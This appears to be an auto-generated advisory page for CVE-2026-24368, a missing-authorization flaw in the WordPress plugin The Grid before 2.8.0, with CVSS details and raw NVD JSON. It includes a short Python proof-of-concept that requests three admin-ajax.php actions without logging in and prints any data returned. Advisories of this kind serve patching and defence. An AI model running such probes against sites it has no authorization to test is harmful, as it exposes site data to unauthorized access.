Security Vulnerability Report
中文
CVE-2026-24368 CVSS 5.3 MEDIUM

CVE-2026-24368

Published: 2026-01-22 17:16:40
Last Modified: 2026-04-28 15:16:07

Description

Missing Authorization vulnerability in Theme-one The Grid the-grid allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Grid: from n/a through < 2.8.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

The Grid插件 < 2.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' endpoints = [ '/wp-admin/admin-ajax.php?action=the_grid_get_items', '/wp-admin/admin-ajax.php?action=the_grid_get_categories', '/wp-admin/admin-ajax.php?action=the_grid_get_settings' ] print('[*] Testing CVE-2026-24368 - Missing Authorization in The Grid') print(f'[*] Target: {target}\n') for endpoint in endpoints: url = target + endpoint print(f'[+] Testing: {endpoint}') try: response = requests.get(url, timeout=10) if response.status_code == 200: print(f' [VULN] Endpoint accessible without authentication') print(f' Response: {response.text[:200]}...') else: print(f' [SAFE] Status: {response.status_code}') except requests.exceptions.RequestException as e: print(f' [ERROR] {e}') print('\n[*] Scan complete')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24368", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:40.303", "lastModified": "2026-04-28T15:16:06.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Theme-one The Grid the-grid allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Grid: from n/a through < 2.8.0."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en Theme-one The Grid the-grid permite explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a The Grid: desde n/a hasta &lt; 2.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/the-grid/vulnerability/wordpress-the-grid-plugin-2-8-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}